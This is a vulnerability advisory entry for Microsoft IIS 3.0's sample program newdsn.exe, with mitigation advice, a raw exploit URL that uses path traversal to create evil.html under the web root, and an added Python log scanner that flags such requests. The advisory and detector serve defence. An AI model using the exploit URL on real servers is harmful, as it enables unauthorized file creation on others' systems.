Vendor: IIS
By: SecurityFocus
CVSS: 7.5 (HIGH)
Remote File Creation
CWE: 264
Product Name: IIS
Affected Version From: Microsoft IIS 3.0
Affected Version To: Microsoft IIS 3.0
Patch Exists: No
Related CWE: N/A
CPE: a:microsoft:iis:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2000

Microsoft IIS 3.0 Remote File Creation

Microsoft IIS 3.0 came with a sample program, newdsn.exe, installed by default in the directory wwwroot/scripts/tools/. Execution of this program with a properly submitted URL could allow for remote file creation. The file created is a Microsoft Access Database, but can have any extension, including .html.

Mitigation:

Disable the newdsn.exe program or remove it from the wwwroot/scripts/tools/ directory.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1818/info

http://vulnerable.site.comtools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil.html&newdb=CREATE_DB
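
A defender-side check, added here and not part of the original advisory: it scans web server access logs for requests to newdsn.exe and explains why each hit matters, using the dbq and newdb parameters seen in the request above. The four-field log layout, the function names and the sample lines are constructed assumptions.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in a simplified "ip method uri status" layout
# (an assumption; adapt the field split to your server's real log format).
SAMPLE_LOG = """\
192.0.2.10 GET /default.htm 200
192.0.2.44 GET /scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=test&dbq=..%2F..%2Fwwwroot%2Fx.html&newdb=CREATE_DB 200
192.0.2.51 GET /scripts/tools/newdsn.exe 404
192.0.2.60 GET /SCRIPTS/TOOLS/NEWDSN.EXE?dsn=inventory&dbq=c%3A%5Cdata%5Cinv.mdb&newdb=CREATE_DB 200
"""

def classify(uri):
    """Return the reasons a request URI is of interest, or [] if unrelated."""
    parts = urlsplit(uri)
    # IIS paths are case-insensitive, so compare in lower case.
    if not parts.path.lower().endswith("/newdsn.exe"):
        return []
    # Any hit on the sample program is worth a look on a production server.
    reasons = ["newdsn.exe requested"]
    # parse_qs percent-decodes values; keep the last value of each parameter.
    params = {k.lower(): v[-1] for k, v in parse_qs(parts.query).items()}
    dbq = params.get("dbq", "").replace("\\", "/")
    if params.get("newdb", "").upper() == "CREATE_DB":
        reasons.append("database creation requested")
    if ".." in dbq.split("/"):
        reasons.append("dbq contains path traversal")
    if dbq and not dbq.lower().endswith(".mdb"):
        reasons.append("dbq target is not an .mdb file")
    return reasons

def scan(log_text):
    """Return (client_ip, status, reasons) for every newdsn.exe request."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # skip malformed or empty lines
        ip, _method, uri, status = fields[:4]
        reasons = classify(uri)
        if reasons:
            findings.append((ip, status, reasons))
    return findings

if __name__ == "__main__":
    for ip, status, reasons in scan(SAMPLE_LOG):
        print(f"{ip} status={status}: " + "; ".join(reasons))
```

A 200 response combined with a non-.mdb dbq target means a file may have been written under the web root; a 404 indicates the program is already removed, as the mitigation recommends.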